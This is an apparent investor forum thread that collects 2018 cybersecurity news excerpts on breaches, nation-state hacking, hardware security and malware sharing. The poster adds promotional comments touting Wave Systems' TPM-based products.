“This is an important milestone for Wave,” said Bill Solms, CEO of Wave. “Wave Virtual Smart Card 2.0 has been purchased by a government agency with significant security requirements and one that requires redundant means of system authentication due to national security interests. This initial sale is modest compared to the addressable market within the Federal Government sector, but it is important to our strategy for marketing the Virtual Smart Card to address critical government infrastructure defense.”
“We believe that this sale, which was completed on a shorter sales cycle than we had anticipated, supports our view that customers are interested in the type of cyber security solution that Wave’s Virtual Smart Card 2.0 provides,” Solms added.
Wave Virtual Smart Card 2.0 is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7. It also supports Windows 8 and 8.1. Wave’s new solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, lower total cost of ownership, and a reduced risk of unauthorized use.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure PIN and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with TPM 1.2 or TPM 2.0
=================================================================
26M Texts Exposed in Poorly Secured Vovox Database
https://www.darkreading.com/cloud/26m-texts-exposed-in-poorly-secured-vovox-database/d/d-id/1333292?_mc=KJH-Twitter-2018-11
The server, which lacked password protection, contained tens of millions of SMS messages, two-factor codes, shipping alerts, and other user data.
A poorly secured database exposed at least 26 million text messages, password reset links and codes, two-factor verification codes, temporary passwords, shipping alerts, and other information belonging to customers of companies including Microsoft, Amazon, and Google.
The leaky database, owned by communications firm Vovox, was found on Shodan by Sébastien Kaul, a security researcher based in Berlin. Kaul discovered the database lacked password protection and left names, phone numbers, and text messages easily searchable. Vovox took down the database after it was contacted with an inquiry from TechCrunch.
However, while the server was still running, anyone could have obtained two-factor codes sent by people attempting account logins. This level of accessibility could have let someone easily take over an account protected with two-factor authentication and an SMS verification code.
While the codes and links exposed are only useful for a finite period of time, there is a risk that attackers were able to compromise users. Security experts have long been wary of SMS verification, saying it's insufficient to properly protect users' data – a lesson learned in the August Reddit breach, which engineers said was rooted in SMS-based two-factor authentication.
=================================================================
Better security by using Wave VSC 2.0 rather than SMS-based 2FA.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
White paper has section on SMS:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
How the U.S. might respond if China launched a full-scale cyberattack
https://www.cyberscoop.com/u-s-respond-china-launched-full-scale-cyber-attack/
The U.S. financial and energy sectors are no strangers to foreign government hackers, from Iranian denial-of-service attacks on American banks to Russian reconnaissance of industrial control systems. Less-familiar territory, however, is how companies would work with the U.S. government to respond to a cross-sector cyberattack during a geopolitical crisis.
About 20 private-sector executives and former government officials gathered last month in Washington, D.C., to take a stab at that question.
A tabletop exercise hosted by the Foundation for Defense of Democracies (FDD), a think tank, hashed out what companies and federal agencies might ask of each other in the 72 hours after a disruptive series of computer intrusions.
The fictional scenario involved a confrontation between the United States and China in the Taiwan Strait, which was followed by a cascading cyberattack on multiple U.S. critical infrastructure sectors. The former defense and law enforcement officials in the room discussed with their private-sector counterparts — executives from the banking, electricity, and retail sectors — how a U.S. government and industry response to the cyberattack might play out.
Participants debated everything from the government’s use of private data to attribute cyberattacks to the potential blowback of offensive U.S. operations.
“The private sector is on the front lines of this new battle space,” the FDD’s Samantha Ravich said, describing the impetus for the exercise. “It’s not [private companies’] business to do national security. Unfortunately, national security is being done to them now with cyber-enabled economic warfare.”
U.S. officials have acknowledged that cyberspace is intrinsic to geopolitical conflict. The FDD drill was a recognition that, in order to succeed in such a conflict, the government and private sector need to be in lockstep.
Companies need to be “a lot more involved [and] informed to protect their interests, and know what the government can do for them and what it can’t,” Ravich, a former national security adviser to Vice President Dick Cheney, told CyberScoop.
Participants in the exercise considered how U.S. government attribution of cyberattacks can help companies defend their networks. There was “a good, robust discussion” on the value of spending limited company resources on helping the government trace the origin of an attack, Ravich said. Knowing which foreign government is behind an intrusion can help a company prepare for future activity, she added.
“There were certain categories of authorities that the folks [formerly] in U.S. government brought up that the private sector really wasn’t aware of,” Ravich added. “Why should they? They’re running businesses; they can’t cite chapter and verse of some authority.”
Dire Straits
The FDD drill explored what might happen if China’s actions in cyberspace escalated, said retired Gen. Michael Hayden, who attended the exercise. Over the course of the exercise, executives feared the private sector would bear the brunt of escalation and cautioned against retaliatory U.S. government measures against China, Hayden told CyberScoop.
“I’m the one who did the intervention and [said], ‘Look, you got the Chinese kicking ass in the digital domain … and you are telling me you want us not to respond?” recalled Hayden, a former director of the National Security Agency. “I said, ‘There is nobody in the NSC [National Security Council] meeting who is not going to vote to respond to the Chinese.’”
For Hayden, a principal at The Chertoff Group consultancy, the drill showed that “there really is daylight” between the government and private-sector perspective on retaliating in cyberspace.
For others in the room, too, real-world events echoed what they saw in the tabletop exercise.
The same month as the exercise, cybersecurity company ESET published research showing how hackers have targeted energy companies in Poland and Ukraine, a campaign that aligns with Russian geopolitical interests.
News of that hacking campaign resonated with Bill Nelson, CEO of the Financial Services Information Sharing and Analysis Center, who also attended the FDD exercise.
“That tells me that we are doing the right thing exercising and actually going through the motions to [rehearse] this because it could happen and it is happening,” Nelson told CyberScoop.
The FDD exercise comes as U.S. officials continue to blame the Chinese government for using cyber and traditional espionage to steal U.S. trade secrets. Earlier this month, Department of Justice officials announced a strategy to combat “rapidly increasing” Chinese economic espionage.
=================================================================
China and the U.S. are currently 2 countries missing from the Paris Call in the previous post. After reading this article it sounds like more defensive preparation is needed and/or a new way of looking at it is needed. Wave's ERAS and Wave VSC 2.0 could offer the U.S. government and companies a way of being able to effectively defend against a full-scale cyberattack from China. Wave Endpoint Monitor could also help in the defense as well. imo.
==================================================================
https://www.wavesys.com/
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
U.S. tech giants back French call for global cooperation in cyberspace
https://www.cyberscoop.com/paris-call-for-trust-cybersecurity-framework/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=79751257&utm_medium=social&utm_source=twitter
Excerpt:
The Paris Call also focuses on private-sector responsibilities in cyberdefense, highlighting the power vested in tech companies and their responsibility to build strong security into their products.
================================================================
French president Macron insists new regulations needed to protect us from Facebook
https://www.theregister.co.uk/2018/11/12/macron_internet_regulation/
Excerpt:
He also pushed a new set of principles that the French government has led termed the "Paris Call for Trust and Security in Cyberspace" which describes itself as a "high-level declaration on developing common principles for securing cyberspace."
================================================================
More than 50 nations, but not U.S., sign onto cybersecurity pact
https://www.axios.com/cybersecurity-paris-call-for-trust-france-21e434df-8a59-48bc-8cde-cd1c1f43dfd0.html
But the signatories include two notable tech sector security agreements: the Microsoft-led Cybersecurity Tech Accord and the Siemens-led Charter of Trust.
•Major tech firms like Microsoft, Facebook, Google, IBM and HP are all signed on — either through those private sector pacts or to the agreement outright.
================================================================
-highlighted TCG members
At USAA, cybersecurity is a ‘24/7 problem’
https://www.expressnews.com/business/technology/article/At-USAA-cybersecurity-is-a-24-7-problem-13376369.php
Amid a raging cyber war, USAA’s cybersecurity experts must be on the defense at all times.
At the Cyber Threat Operations Center, located inside the bank’s headquarters in San Antonio, they are always monitoring attempts by cybercriminals to gain access. Teams focus on detecting threats, analyzing them, looking for vulnerabilities and reverse engineering malicious software. There’s someone on shift around the clock.
An electronic map on a wall in the center lights up with yellow arcs showing the millions of attacks against the firm on a daily basis. They come in from all over the world.
On a recent weekday, there were more than 12 million in a 24-hour period. Gary McAlum, chief security officer at USAA, said he’s seen that figure get up to 20 million.
“We look at security as a 24/7 problem,” he said. “The problem of cybersecurity never gets solved. It just changes and morphs continuously.”
Financial institutions have always been appealing targets for thieves, but the frequency and sophistication of cyberattacks has contributed to a sense of urgency. Hackers have unlimited times and resources, McAlum said. At USAA, “we live in a state of what I call healthy paranoia,” he added.
Along with financial implications, breaches can tarnish a company’s brand.
The average cost of cybercrime in the financial services sector was $18.28 million last year, according to a study by Accenture and Ponemon Institute. It was the highest figure among the 15 industries the groups looked at.
In a 2017 report, the U.S. Department of the Treasury listed cyberattacks as one of the main threats to the industry. “Financial firms are connected through complex, interconnected networks,” the authors wrote. “Disruptions to the operations of a key institution in the financial system could be transmitted through these networks and lead to a systemic crisis.”
Financial firms are getting better at preventing attacks, another report by Accenture found. They surveyed more than 800 security professionals from the financial services sector and found that companies stopped 81 percent of breaches between Feb. 1, 2017, and Jan. 31, 2018, compared with 66 percent for the 12 months prior to that time period.
However, more than 40 percent of breaches on average went unnoticed for over a week, they found.
“Financial services firms are converging to a level of mastery when it comes to the security status quo, including their cyber resilience and response readiness,” Chris Thompson, global security and resilience lead for financial services at Accenture Security, said in a news release. “But as business technology evolves, so too must cybersecurity. The new technologies that banks and insurers are embracing — including cloud, microservices, application programing interfaces, edge computing and blockchain — will create new security risks, especially as cyberattacks evolve in sophistication.”
USAA had a net worth of $30.6 billion and more than 12 million members last year, according to its annual Report to Members. The firm has the dual responsibility of protecting its enterprise, which includes employees, servers, mobile devices, computers, data and the supply chain, as well as its members and their digital interactions, McAlum said.
“You have to respect the threat because they have unlimited resources and every advantage,” he said. “If you ever think you're better than the threat, you get complacent and careless.”
The organization and other financial institutions see an assortment of attacks, from large-scale bot attacks to phishing sites to different kinds of malware, said Joe Arthur, USAA’s executive director of information security engineering and cyber operations. The firm does penetration testing, both standard tests and unannounced ones to see how employees respond to simulated attacks, and provides training for employees.
One of the six teams he leads focuses on threats that didn’t manage to get in, looking at who might be targeting the organization and how they can detect them.
“How do we understand the latest tactics and techniques that are out there that are used by attackers, and then how well-positioned are we to defend against that sort of attack?” Arthur said.
The biggest challenge on the consumer end is authentication, McAlum said.
The main way to verify someone’s identity currently is through knowledge-based authentication: People have to enter a user ID and a password and possibly answer a few security questions.
==================================================================
When I see articles like this and the immensely positive impact Wave could have on USAA and others, and USAA is only an hour and half away, one conversation with the right person could have Win-Win benefits to USAA and Wave! And USAA isn't the only financial services company running its cybersecurity this way.
==================================================================
Some important links for those interested in Wave:
https://www.wavesys.com/products/wave-virtual-smart-card
The white paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Enterprises Sinking Under 100+ Critical Flaws Per Day
https://www.infosecurity-magazine.com/news/enterprise-sinking-100-critical
Enterprises are forced to deal with an estimated 100+ critical vulnerabilities each day, with Flash and Microsoft Office accounting for the majority of top app flaws, according to new research from Tenable.
The security vendor analyzed anonymized data from 900,000 vulnerability assessments across 2100 enterprises to compile its latest Vulnerability Intelligence Report.
It predicted that the industry is set to disclose 19,000 new vulnerabilities this year, up 27% from last year — although other estimates put the 2017 figure at nearly 20,000.
Other stats from the Tenable report highlighted the increasing challenge facing system administrators tasked with prioritizing patches.
It claimed that, on average, an enterprise finds 870 vulnerabilities per day across 960 assets, with 61% listed as high severity. Yet just 7% have public exploits available, making it difficult to know which of the remaining 93% to fix first, the firm argued.
That’s especially true when one considers that many hackers deliberately target older vulnerabilities that may have been forgotten about.
Out of the 20 application vulnerabilities affecting the largest number of enterprises, several came from 2015.
Half of that top 20 related to Adobe Flash bugs, followed by Microsoft Office at 20%, with the eight top web browser CVEs from Google and Microsoft impacting 20-30% of enterprises on a single day.
“When everything is urgent, triage fails. As an industry, we need to realize that effective reduction in cyber risk starts with effective prioritization of issues,” said Tom Parsons, senior director of product management, Tenable.
“To keep up with the current volume and velocity of new vulnerabilities, organizations need actionable insight into where their greatest exposures lie; otherwise, remediation is no more than a guessing game. This means organizations need to focus on vulnerabilities that are being actively exploited by threat actors rather than those that could only theoretically be used.”
=================================================================
It seems that Wave Endpoint Monitor could play an important role in protecting the device while these vulnerabilities are being fixed. It should be a great product for organizations to have in their cybersecurity arsenal. imo.
=================================================================
https://www.wavesys.com/malware-protection
Excerpt:
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpts:
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
Key Features:
Easy security compliance
• Comports with NIST guidelines for BIOS integrity
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
• Get Windows 8 Malware protection now—WEM covers previous versions of Windows
Simplicity
• Uses standards-based security that’s in every PC you own
• Measurement notifications and reports can be customized for your processes and work flows
• Centralized, remote activation and management of your TPMs
• E-discover which PCs in your organization are enabled for endpoint monitoring
No compromises
• Ensure host integrity—without expensive hardware or excessive administrative overhead
Guess who's back, back again? China's back, hacking your friends: Beijing targets American biz amid tech tariff tiff
https://www.theregister.co.uk/2018/11/09/china_hacking_usa/
Everything little thing Xi does is magic, everything Xi do just turns me intrusion alarms on
Three years after the governments of America and China agreed not to hack corporations in each other's countries, experts say Beijing is now back to its old ways.
And if that's the case, we can well imagine Uncle Sam having a pop back.
Speaking at the Aspen Cyber Summit in San Francisco on Thursday, a panel including top NSA adviser Rob Joyce and Symantec CEO Greg Clark said the 2015 truce the Obama administration struck with Beijing has been all but wiped out over the past year. The Middle Kingdom has now returned to spying on American businesses, stealing secrets and gathering intelligence with a new zeal.
"It had a marked impact on the way that the Chinese were behaving," former White House security czar Joyce said of the Obama-Xi agreement. "We have certainly seen the behavior erode in the last year, and we are very concerned with those troubling trends."
The rise in activity comes amid the escalating trade war between the US and China, with each side raising tariffs on imports.
Post hoc ergo propter hoc
However, correlation does not necessarily mean causation. Dmitri Alperovitch, cofounder and CTO of CrowdStrike, noted that events within China, most notably a series of government reforms and anti-corruption campaigns, played a significant part in limiting activity against the US in past years as Beijing-backed hackers focused their activities within the country, spying on undesirables, rather than against foreign targets.
"We were tracking those Chinese threat actors," Alperovitch said. "They didn't cease to exist, but they were just hacking Chinese companies."
Regardless of the cause, the panelists agreed that China is now back with a vengeance.
Clark said that things have got so bad that one of his clients has given up entirely on its latest generation of products, believing the blueprints to have been completely and comprehensively snatched by Chinese hackers.
"I had a very large corporate manufacturer come into our office and say 'we have stopped trying to protect it, it has all been stolen, we want to innovate faster'," the Symantec boss said.
Where the panelists differ is on what to do about the renewed hacking efforts from the world's most populous nation. For Joyce, the US government and the information security community at large can help by making life more difficult for President Xi's hackers themselves.
"Overall, it is about making it harder for them to succeed, and some of that will be taking away the infrastructure they're using, some of that will be exposing their tools," Joyce said. "There are a number of strategies you can come up with that make it less effective, less efficient, and less likely to be successful."
The solution: more war
Alperovitch argued that further economic sanctions will go a long way toward sending a message to Beijing.
"It is not a cyber problem, it is an economic warfare problem," he said. "Responding with economic actions of our own and putting pressure on China is the right strategy,"
There is also hope that China's own internal development will alleviate the problem. Panelist Elsa Kania, adjunct fellow at the Center for a New American Security, believes that as Chinese companies further move into the international market, coming up with their own innovative ideas and concepts will take precedence over stealing intellectual property from rivals.
"There is clearly an ambition to graduate beyond IP theft and become more of a leader," Kania said. "There may be a broader transformation going forward." ®
=================================================================
Companies could start anew by using cybersecurity products that work effectively!! These products could be a game changer for companies in stopping the Chinese. Wave's products are mostly different from a lot of cybersecurity companies' products, and different because they work effectively! The links for these important products are provided below:
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
The link for Wave's site is: https://www.wavesys.com/
Apple Modernizes Its Hardware Security with T2
https://threatpost.com/apple-modernizes-its-hardware-security-with-t2/138904/
Apple has widened the range of Macs running its T2 security chip. Is macOS finally catching up with other platforms when it comes to secure computing?
When Apple launched its latest MacBook Air last month, one of its more unusual features is that the built-in microphone automatically turns off when the lid is closed.
Apple introduced the feature to eliminate any possibility of malware – or other unwanted applications – using the laptop’s microphone to eavesdrop on users.
The mic shut-off function is written into Mac systems via the security-focused T2 chip, and it’s just the latest use for the T2, which is a powerful piece of security technology that acts as the hardware root of trust for the Mac ecosystem.
The feature made headlines, even though the risk of anyone using a MacBook Air to bug conversations might seem low. But the bigger story is that with the expansion to the Air and other devices in its portfolio, Apple seems to be taking hardware security seriously. And researchers say Macs may finally be catching up to other computing platforms on that score.
Inside the T2
Apple first introduced the T2 with the iMac Pro in late 2017, then added it to MacBook Pro computers earlier this year – and most recently, it’s been implemented into the new MacBook Air and Mac Mini.
Apple’s first-generation security chip, the 32-bit T1, was introduced with the 2016 MacBook Pro line, again to drive the Touch ID system. Apple upgraded the T2 to a 64-bit chip, based on a single-core version of its A10 iPhone processor, to handle a much wider range of tasks.
The T2’s functions are indeed wide-ranging: It acts an audio and mic controller, and controls the computers’ FaceTime cameras and even cooling systems. Vitally, it also governs storage security, and on top of that, it acts as a system-management chip. For instance, on the MacBook Pro, T2 controls the Touch ID on the TouchBar, and stores the biometric data in an on-board Secure Enclave co-processor.
With this more powerful chip, Apple appears to be setting out to add some heavyweight security features to the Mac. For instance, on T2-equipped Macs, the chip controls the boot process, and checks that the operating system is correctly signed. If it is, the machine moves on to the next part of the boot cycle. The T2 will validate current versions of MacOS and also Windows 10 – although at present, the chip will not allow a Mac to boot Linux.
The T2’s secure-boot facility is built to ensure that Mac owners don’t fall victim to modified system software or malicious updates. And, because T2 controls the Mac’s identity, it will work with mobile device management (MDM) technology to make it easier to administer secure boot for large numbers of MacBooks. This is a potential big benefit to enterprises – and to education in particular, where issuing laptops to students is increasingly common.
Unlike on the iPhone and iPad, Mac users do have a degree of control over their machine’s security settings. To that end, Apple provides an application called the Startup Security Utility, to control some of the T2’s behavior. Users can, for example, opt for “medium” security in order to use older versions of MacOS, or they turn the OS verification off altogether. This lets newer Macs boot in the same way as older models, without the T2’s intervention, although this is apparently not enough to fix the Linux issue.
Apple’s Storage Security
Aside from secure boot, the T2 has another core security function, one which could be even more important to data protection-minded computer users.
“The new T2 chip also provides a built-in hardware encryption engine that encrypts all of the data stored on the solid-state drive (SSD) with a unique security key on each Mac,” explained James Plouffe, strategic technologist at MobileIron, a mobile security specialist. “This means that all of the data on a Mac can only be read by that Mac, even if the SSD is removed. This adds another layer of security for enterprise data.”
Data encryption is not new to the Mac platform, it should be said: Apple has offered various flavors of its FileVault technology for several years. The advantage of the T2 chip comes from its dual function as a storage controller as well as an identity and encryption manager.
The T2 chip encrypts and decrypts data on the fly with, Apple says, no loss in performance. The encryption uses the AES-256 standard, which is the same used on iOS devices. The T2 sits between Apple’s NVMe storage chips and the Intel processor, and makes use of the native encryption functions in the Apple File System (APFS). This combination makes permanent, entire disk encryption realistic, according to Derrick Donnelly, chief scientist at BlackBag Technologies, an IT forensics firm.
“Encryption is on by default even if the user has not turned on FileVault; Apple is using encryption at rest,” said Donnelly. “Apple is using a new raw memory drive, with a new interface and no PCIe controller, and it talks directly to the T2 chip.”
The T2 also has a one more trick to play. Apple’s technology combines a unique identifier from the T2 chip with the Mac owner’s password, and uses this as the basis for the storage encryption keys.
In simple terms, this prevents anyone from accessing the content of the NVMe storage chips, unless they have the user’s credentials and access to the Mac’s original T2 chip.
As long as users turn FileVault on, this makes it extremely unlikely that anyone could access the data in storage files by attempting to hack into the physical storage components according to researchers at Duo, a security vendor now owned by Cisco.
Apple Security in the Wider World
Apple of course is not alone in bringing hardware security to its devices, and in some ways, it’s playing catch up both with the Windows PC market, and with its own iOS devices. Trusted Platform Modules (TPMs), support for two-factor authentication and Intel’s vPro chipset – offered widely in business-oriented laptops – already do much of what Apple is setting out to do with T2.
So is Apple up to snuff now? While the T2 may also introduce potential downsides (BlackBag Technologies’ Donnelly cautions that upgrade options, data recovery and even law enforcement access to data could become more difficult as Apple moves its systems to T2), Apple’s hardware-based encryption is scoring high marks with researchers.
“By taking their proven success and leadership on the iOS platform with respect to security and privacy, Apple has been able to fast-track catching up with competing platforms that already implement modern hardware security features,” says Pepijn Bruienne at Duo.
In all, T2 technology could be significant step forward for anyone who needs a secure computing platform. Just remember to keep that lid closed.
=================================================================
Apple's T2 seems like a real endorsement for the TPM! There are already 150+ companies supporting the standard already (TCG). With at least a billion TPMs in computers, not using the technology would be almost ludicrous when there is daily news of hacks and breaches!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Microsoft President: Governments Must Cooperate on Cybersecurity
https://www.darkreading.com/vulnerabilities---threats/microsoft-president-governments-must-cooperate-on-cybersecurity/d/d-id/1333231?_mc=sm_iwfs_editor_kellysheridan
Microsoft's Brad Smith calls on nations and businesses to work toward "digital peace" and acknowledge the effects of cybercrime.
It's an exciting time to be in technology, according to Microsoft president Brad Smith. It's also a dangerous time.
Smith took the stage at this year's Web Summit, a tech conference held in Lisbon, Portugal, to emphasize the need for global cooperation on cybersecurity as technology continues to evolve. The benefits that technology has created are as dangerous as they are awe-inspiring, he said.
"It's an exciting time to be at a place like this," he said. "But that's not the only thing that's happening. We also live in a time when new threats are emerging … new threats that involve technology itself" and culminate in attacks on electrical grids and elections alike.
Addressing an audience of tech professionals, Smith explained: "The tools that we've created — the tools, oftentimes, that you've created — have been turned by others into weapons." It's something Microsoft sees in 6.5 trillion signals and data points it receives daily, he added.
Smith said often when he speaks to people in government about these attacks, they sometimes say "we don't really need to worry" because cyberattacks involve machines targeting machines, not machines targeting people. He disagrees.
"That is a problem. Because people are being victimized by these attacks," he explained. He called 2017 "a wake-up call" in terms of the way people in nation-states and governments are using technological tools as weapons. WannaCry and NotPetya were the prime examples.
We can't expect people to recognize the problems of cybercrime if we don't recognize how people are suffering. Hospitals were paralyzed when WannaCry hit the UK. At England's National Health Service, 19,000 appointments were canceled. Surgeries didn't happen. Shortly after WannaCry hit 300,000 machines in 150 countries, he added, NotPetya struck.
"What NotPetya represents is not just the evolution of the attack in terms of methodologies involved, but also the evolution of intent," said Smith. Last year, almost 1 billion people were victims of a cyberattack. "These issues and these threats are going to continue to grow … because everything is connected," he warned. It's time to have a conversation around security.
"In a world where everything is connected, everything can be disrupted," he continued.
Governments around the world must play a role in protecting civilians and civilian infrastructure, he said, and protect people while they're using devices on which their lives exist. However, governments can't do this alone, and so he also called on businesses to step up.
"Businesses need to do better as well, and there is no part of the business community, across Europe or in the US or around the world, that has a higher responsibility than one part of the business community — and that is the tech sector," Smith noted. IT has the greatest responsibility to be "first responders" in keeping people safe when there are cyberattacks.
The same week he gave this talk at Web Summit, Smith explained in an interview with CNBC how Microsoft wants to connect with Congress and work together to create cybersecurity guidelines for civilians. Key issues range from threats on democracy to artificial intelligence in the workplace.
We have reached a point at which people are enthusiastic about the evolution of technology; however, their eagerness is matched with growing worry about what this technology can do.
"The big shift has been [that] the era where everyone was just excited about technology has become an era where people are excited and concerned at the same time — and that's not unreasonable," he explained in a conversation with CNBC.
Smith says Microsoft wants to work with President Trump, as it worked with President Obama, to address the risk of technology. The concern isn't only for America, but for all countries.
==================================================================
How has cybersecurity really improved under the Obama and Trump administrations? Maybe Microsoft's message will include the missing ingredient to better cybersecurity - an activated TPM and services with it. The tech industry has spent billions to develop this state of the art technology for cybersecurity. It seems like it would be wise to use it on a global scale before there are more serious cyber attacks. imo.
==================================================================
https://www.wavesys.com/
US Cyber Command starts uploading foreign APT malware to VirusTotal
https://www.zdnet.com/article/us-cyber-command-starts-uploading-foreign-apt-malware-to-virustotal/
USCYBERCOM said it plans to regularly upload "unclassified malware samples" to VirusTotal
On Monday, the Cyber National Mission Force (CNMF), a subordinate unit of US Cyber Command (USCYBERCOM), set in motion a new initiative through which the DOD would share malware samples it discovered on its networks with the broader cybersecurity community.
The CNMF kicked off this new project by creating an account on VirusTotal, an online file scanning service that also doubles as an online malware repository, and by uploading two malware samples.
In addition, USCYBERCOM also created a new Twitter account where it would tweet a link to all new VirusTotal malware uploads.
USCYBERCOM's decision was met with universal praise by leading voices from the cybersecurity private sector.
"This is a great initiative and we believe that if more governments would do the same, the world would be safer. We salute their initiative and are of course paying close attention to what they upload," said Costin Raiu, Director of Global Research & Analysis Team at Kaspersky Lab.
"We believe that having more files in VirusTotal increases the value to the entire community," said Mike Wiacek, CSO, and co-founder of Chronicle, Alphabet's cyber-security division and the company behind VirusTotal.
"In fact, the first submission, for LoJack malware, included files that weren't previously in VirusTotal," Wiacek told ZDNet today via email.
That new file was rpcnetp.dll, a file that together with the second --rpcnetp.exe-- have been utilized to infect victims with the Computrace/LoJack/LoJax malware.
Craiu told ZDNet that Kaspersky has been tracking this malware for years; malware which came back to life this year in new campaigns, as detected by Netscout and ESET.
LoJax is currently the first documented case of a UEFI rootkit used in the wild, and the malware has been tied to APT28, a codename used to identify a nation-state cyber-espionage group that has been associated by several Western countries to Russia's military intelligence agency GRU.
USCYBERCOM's decision to make these two particular malware samples its first two uploads didn't go unnoticed by the infosec community. Some sharped-eye pundits immediately categorized it as a new name-and-shame effort on the part of Western governments, which have been very active this year in exposing and indicting Chinese, Russian, Iranian, and North Korean hackers.
"It remains to be seen exactly how this new initiative will unfold," John Hultquist, director of intelligence analysis at FireEye told ZDNet in an email today.
"But what is striking about this initiative is it lacks many of the contextual elements of the name and shame strategy. Whereas that strategy involves a tremendous amount of context which has to be scrutinized throughout the government, this initiative could be less encumbered by those considerations," Hultquist said.
"There will undoubtedly still be a strategy behind these disclosures, since disclosures always have consequences for intelligence operations, but their simplicity may allow for simpler, faster action, something the government has historically struggled with."
On the other hand, there are those security researchers who purposely stay away from politically-charged attributions when dealing with APT malware.
For example, in an interview with ZDNet, Alexis Dorais-Joncas, Security Intelligence Team Lead at ESET, was far more interested in how USCYBERCOM's VirusTotal uploads might influence an APT group's upcoming operations, rather than the political downfall that follows.
"As far as exposing hacking toolsets, it does not necessarily automatically render the tools totally useless, but it is likely to at least cause the attacker to adapt," Dorais-Joncas told us. "For example, ESET has been exposing [APT28]'s toolset evolution for years, and yet the group is still using a lot of the same tools, albeit with additional improvements added over time."
"I would say exposing full [tactics, techniques, and procedures] on top of actual samples would be more harmful to attackers, as they would need to change their entire attack workflow (think spreading and infection mechanisms, persistence, communication protocols, etc)," Dorais-Joncas said. "It does not look like USCYBERCOM is providing such context together with the samples they are sharing, so that might limit the upside of their initiative."
"Only time will tell if samples shared by USCYBERCOM will turn up to be interesting for researchers or not - it really depends on what they choose to share," the ESET researcher added. "I'm inclined to give them the benefit of the doubt for now."
But the infosec community also had another gripe with USCYBERCOM's new sharing practice, and that's with what the DOD considers "unclassified malware samples."
Both ESET's Dorais-Joncas and FireEye's Hultquist shared the same opinion on this topic --that even if the agency used the term "unclassified malware samples," this doesn't necessarily mean we'll get your run-of-the-mill malware such as adware and basic downloaders.
"This effort may very well expose us to new threats, which require serious analysis," Hultquist said.
"I would also not presume that unclassified malware will automatically already be known to researchers," Dorais-Joncas also added.
"In general, I would say more sample sharing can only lead to equal or better protection because any new sample security vendors can obtain helps them improve their detection databases and thus better protect their respective customers."
As for Wiacek, the Chronicle CSO would more than love to see other intelligence and law enforcement agencies to follow in the DOD's footsteps.
"We invite other U.S. and international agencies to participate in a similar manner," Wiacek said. "We are happy to see new members in the VirusTotal community."
=================================================================
The government, if it were privy to all the anti-malware solutions in the marketplace, would see that a white listing product like Wave Endpoint Monitor is so much more effective than loading foreign APT malware in Virus Total. imo.
==================================================================
